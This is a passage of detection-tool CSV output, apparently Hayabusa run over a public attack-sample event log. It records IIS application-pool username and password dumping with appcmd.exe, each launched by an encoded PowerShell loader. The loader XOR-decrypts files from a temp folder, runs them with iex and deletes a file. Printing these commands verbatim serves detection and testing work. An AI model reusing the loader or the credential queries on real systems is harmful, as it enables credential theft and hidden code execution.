YwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3144 | PGUID: 365ABB72-3D6E-5CEB-0000-00108C8EFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.352 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3100 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C92FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.432 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3136 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C96FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.522 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 344 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC99FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.662 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3756 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EF9EFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.742 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3812 | PGUID: 365ABB72-3D6E-5CEB-0000-0010AFA2FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.822 